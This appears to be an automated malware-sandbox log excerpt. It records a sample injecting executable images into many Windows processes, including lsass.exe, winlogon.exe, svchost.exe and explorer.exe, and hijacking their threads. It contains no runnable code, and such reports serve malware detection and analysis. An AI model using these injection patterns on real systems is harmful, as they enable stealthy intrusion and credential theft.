Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 280C22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1FB970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 25EE91B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1AD31C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 226AD1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 138D43C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 236C6DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 15829E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D643A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDEB370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F41AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 20631820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 19C5BA20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DE98F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1CCE3640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1858EA10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 228C25A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2942EBE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 23D96450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1C8A0380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 26D9F390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1E5EF030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 248D2920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 21C0EE50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43B8A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43BA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 165EDA50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000 value starts with: 4D5A
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140000000 value: 4D
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140001000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140367000 value: 1E
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 1404A0000 value: F0
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140753000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140775000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140776000 value: C5
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140777000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140779000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 14077B000 value: 60
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 14077C000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 14077D000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 81E010 value: 00
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 3968 base: 29E0000 value: 4D
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 1528 base: CD0000 value: 4D
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 1528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 4672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 7560
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 5880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 7528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 4912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 1528 1
Source: C:\Users\user\AppData\Local\Temp\paint.exe Memory written: C:\Windows\System32\conhost.exe base: 113DAF00000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 12BE3BE0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 21E7B340000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140001000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140367000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140753000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140775000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140776000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140777000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140779000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 81E010
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory written: C:\Windows\System32\conhost.exe base: 236ACAA0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 780000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 800000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 3B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 231A3A3010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: B712225010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: E7A5297010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 79686B5010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC60380000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 161C7340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 233B91B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 210918F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2062E960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 282B8D70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22856DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207BAC00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27A01800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2992B230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23227590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28098F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23ACD780000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F1C1330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192A4090000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5112C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2848B1D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A12F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D8115C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C8B4690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 213C6680000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25B905C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2905A8E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A5FA180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19296180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24ED0B70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20955300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B054660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15D00D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20983090000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 278CACC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DAE2270000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 284FF340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22687920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B661F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DD637D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 29E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2081CC80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23263180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2064B670000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1F535400000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 149A8F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115780000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29204CE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A0126F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 251F17A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000
